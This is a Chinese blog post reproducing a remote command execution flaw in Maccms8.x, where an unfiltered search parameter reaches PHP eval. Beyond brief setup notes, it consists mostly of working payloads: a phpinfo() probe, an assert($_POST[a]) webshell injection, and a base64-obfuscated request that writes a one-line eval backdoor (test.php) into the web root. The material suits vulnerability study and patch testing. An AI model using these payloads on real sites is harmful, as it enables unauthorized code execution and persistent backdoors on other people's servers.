Maccms8.x(苹果cms)命令执行漏洞复现

0x00 漏洞概述

村里刚通网,复现下maccms的命令执行漏洞
该漏洞主要的产生原因是CMS搜索页面搜索参数过滤不严
导致直接eval执行PHP语句,前台命令执行可getshell

0x01 影响版本

Maccms8.x

0x02 漏洞复现

环境搭建

下载Github上的环境:
Maccms8.x源码

然后使用phpstudy搭建安装即可
也可自己搭建Apache+Mysql+php环境安装

漏洞利用

payload:

url+/index.php?m=vod-search&wd={if-A:phpinfo()}{endif-A}

getshell payload(a):

url+/index.php?m=vod-search&wd={if-A:assert($_POST[a])}{endif-A}
POST
a=phpinfo()

写入网站根目录一句话木马文件payload(文件名:test.php,密码:test):

url+/index.php?m=vod-search

wd={if-A:print(fputs%28fopen%28base64_decode%28dGVzdC5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW3Rlc3RdKTsgPz4%29%29)}{endif-A}

0x03 参考文章

苹果CMS漏洞
Maccms8.x: Maccms8.x


   转载规则


《Maccms8.x(苹果cms)命令执行漏洞复现》 dylan 采用 知识共享署名 4.0 国际许可协议 进行许可。
 上一篇
海洋cms(SEACMS) 漏洞整合复现 海洋cms(SEACMS) 漏洞整合复现
0x00 漏洞概述海洋CMS V6.28 存在命令执行漏洞,漏洞具体内容参见: 海洋CMS V6.28 命令执行 0DAY 在2017年2月,海洋CMS 6.45版本存在一个前台getshell漏洞,漏洞具体内容参见:SeaCMS v6.4
2019-11-04
下一篇 
Wordpress未授权访问漏洞复现(CVE-2019-17671) Wordpress未授权访问漏洞复现(CVE-2019-17671)
0x00 漏洞概述wordpress 爆出最新的查看未经身份验证的文章漏洞,该漏洞源于程序没有正确处理静态查询,攻击者可利用该漏洞未经认证查看部分内容。 0x01 影响版本WordPress <= 5.2.3 0x02 漏洞复现环境搭
2019-11-04
  目录